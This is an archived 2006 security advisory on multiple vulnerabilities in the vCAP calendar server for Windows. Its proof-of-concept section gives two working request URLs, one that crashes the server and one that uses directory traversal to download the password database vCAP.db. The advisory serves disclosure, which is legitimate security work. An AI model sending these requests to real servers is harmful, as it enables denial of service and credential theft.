Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

уязвимости во многих популярных движках из за некоректной работы файловых функций языка PHP

[Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure

[Full-disclosure] KorviBlog - XSS permanent !

Multible injections and vulnerabilities in Jetbox CMS

From:	securma massine <securma_(at)_morx.org>
Date:	11.09.2006
Subject:	vCAP calendar server Multiple vulnerabilities

title: vCAP calendar server Multiple vulnerabilities

Author: securma massine <securma@morx.org>
MorX Security Research Team
http://www.morx.org

Product info : vCAP (www.pscs.co.uk)is a network calendar server for Windows. vCAP allows user to create calendars which can be viewed and modified by people on  network using a web browser.

Original Advisory/PoC : http://www.morx.org/vcap.txt

Severity: Medium/High - user can remotely attack the server

Vulnerability Description:
v1: denial of service attack with a specific request
v2: directory traversal , any file on the system can be downloaded  ,especially vCAp's passwords  (vCAP.db)

Affected Software(s): vCAP calendar server 1.9.0 Beta and prior

Affected platform(s): Windows

Exploit/Proof of Concept:
v1- http://127.0.0.1:6100/StoresAndCalendarsList.
cgi?session=%d%d%d%d%d
v2- http://127.0.0.1:6100/../Data/vCAP.db

Solution : ??

History:
16/08/2006   initial vendor contact
17/08/2006   sending vulnerability details
31/08/2006   vulnerability confirmed


Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.The author do not have any responsibility for any malicious use of this advisory or proof of concept code.